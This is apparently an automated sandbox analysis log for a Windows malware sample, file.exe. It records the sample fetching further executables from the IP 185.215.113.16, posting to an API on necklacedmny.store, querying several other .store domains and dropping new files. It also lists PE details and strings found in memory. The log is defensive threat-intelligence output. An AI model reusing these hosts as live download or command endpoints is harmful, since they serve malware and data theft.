          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.16
          Source: global trafficHTTP traffic detected: GET /off/def.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: global trafficHTTP traffic detected: GET /mine/random.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: 185.215.113.16
          Source: global trafficDNS traffic detected: DNS query: presticitpo.store
          Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
          Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
          Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
          Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
          Source: file.exe, 00000000.00000003.2429259759.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429200041.00000000014C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
          Source: file.exe, file.exe, 00000000.00000003.2429181569.00000000014D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
          Source: file.exe, 00000000.00000003.2429181569.00000000014D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeIN
          Source: file.exeString found in binary or memory: http://185.215.113.16:80/off/def.exe
          Source: file.exe, 00000000.00000003.2429181569.00000000014D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/off/def.exet7
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: file.exe, 00000000.00000003.2204926355.000000000147D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217166199.000000000147D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221222976.000000000147D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
          Source: file.exe, 00000000.00000003.2186120112.0000000005BF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
          Source: file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
          Source: file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
          Source: file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
          Source: file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
          Source: file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
          Source: file.exe, 00000000.00000003.2228791719.00000000014E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
          Source: file.exe, 00000000.00000003.2228791719.00000000014E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/:_
          Source: file.exe, 00000000.00000003.2217166199.00000000014CA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429200041.00000000014C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156090086.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2200728594.00000000014F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
          Source: file.exe, 00000000.00000003.2228791719.00000000014EC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiH
          Source: file.exe, 00000000.00000003.2429259759.00000000014C8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2429200041.00000000014C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apiV
          Source: file.exe, 00000000.00000003.2217166199.0000000001463000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221222976.0000000001463000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204926355.0000000001463000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apif
          Source: file.exe, 00000000.00000003.2217103680.00000000014E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/r_
          Source: file.exe, file.exe, 00000000.00000003.2429181569.00000000014D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204861781.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205217428.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217026207.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2200728594.00000000014F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api
          Source: file.exe, 00000000.00000003.2185365736.00000000014FA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2185847364.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204861781.00000000014F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2205217428.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2217026207.00000000014FB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2200728594.00000000014F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/apiK
          Source: file.exe, 00000000.00000003.2187335901.0000000005CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: file.exe, 00000000.00000003.2187335901.0000000005CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
          Source: file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
          Source: file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
          Source: file.exe, 00000000.00000003.2156968333.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157025323.0000000005BFC000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157111169.0000000005BFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
          Source: file.exe, 00000000.00000003.2187228610.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
          Source: file.exe, 00000000.00000003.2187228610.0000000005BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
          Source: file.exe, 00000000.00000003.2187335901.0000000005CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
          Source: file.exe, 00000000.00000003.2187335901.0000000005CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
          Source: file.exe, 00000000.00000003.2187335901.0000000005CD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
          Source: file.exe, 00000000.00000003.2187647503.0000000005BBC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49713 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49716 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.6:49743 version: TLS 1.2

          System Summary

          barindex
          Source: file.exeStatic PE information: section name:
          Source: file.exeStatic PE information: section name: .idata
          Source: UK2346Q4E08RPNV0H.exe.0.drStatic PE information: section name:
          Source: UK2346Q4E08RPNV0H.exe.0.drStatic PE information: section name: .idata
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name:
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name: .idata
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: section name:
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146EF730_3_0146EF73
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146EF730_3_0146EF73
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01476B200_3_01476B20
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01476B200_3_01476B20
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014768BE0_3_014768BE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014768BE0_3_014768BE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146EF730_3_0146EF73
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_0146EF730_3_0146EF73
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01476B200_3_01476B20
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_01476B200_3_01476B20
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014768BE0_3_014768BE
          Source: C:\Users\user\Desktop\file.exeCode function: 0_3_014768BE0_3_014768BE
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeCode function: 6_2_00E3E9786_2_00E3E978
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeCode function: 6_2_00E49B0F6_2_00E49B0F
          Source: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exeCode function: 6_2_00CBDC636_2_00CBDC63
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\UK2346Q4E08RPNV0H.exe 0EFA9CAC51FA334FA1EBEE313DB11BD08D65FFDF4ED573CDECF071B4FCE96B2E
          Source: 0L9V49BGE9BOE4IYXIIV26RZIS7RT6.exe.0.drStatic PE information: Data appended to the last section found
          Source: file.exe, 00000000.00000003.2429501120.000000000630D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2363690947.000000000623D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2343058768.0000000006113000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2438409632.00000000061BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2442034322.0000000006331000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2381566242.000000000616A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2324328232.0000000005CB8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2359721741.0000000006146000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2341974936.000000000611B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2433054077.0000000006055000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2339163516.0000000006103000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2330828483.00000000060F2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2432012723.00000000061A4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2357322579.000000000605B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2439430438.0000000006053000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2354119016.00000000061FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2435666038.0000000006058000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2440640356.0000000006320000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2342066597.000000000605B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2333211958.0000000006058000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2351815197.0000000006124000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2346338896.0000000006127000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2338599352.000000000610B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2446044180.0000000006058000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2345444351.0000000006061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2445804856.0000000006323000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2335038061.000000000610A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2360122613.0000000006059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2342734557.000000000605A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2349324849.0000000006126000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2356198204.0000000006136000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2428930626.0000000005C64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2336226401.00000000061AF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2336781904.0000000006061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2360907808.000000000605A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2362665936.0000000006059000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2336879235.000000000611E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2363848985.000000000605C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2350209249.00000000061FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2366850585.000000000624F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2356554802.0000000006220000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2358532036.0000000006060000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2331470577.000000000605F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2351069348.0000000006133000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2362500530.0000000006145000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2337418850.0000000006061000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2349060431.0000000006123000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2325513739.000000000605F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2379109079.000000000605C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2429125899.00000000014F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2349182404.000000000605F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2355293224.000000000613C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2334399670.00000000061AE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2439591307.00000000061B9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2366077673.0000000006151000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2335588663.0000000006054000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2429051638.0000000005BB2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2378773300.0000000006057000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2332016299.00000000060F4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2345759113.000000000605F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2365352624.000000000614A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2355401079.000000000605B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2327251010.00000000060FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
          Source: file.exe, 00000000.00000003.2362977459.0000000006149000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
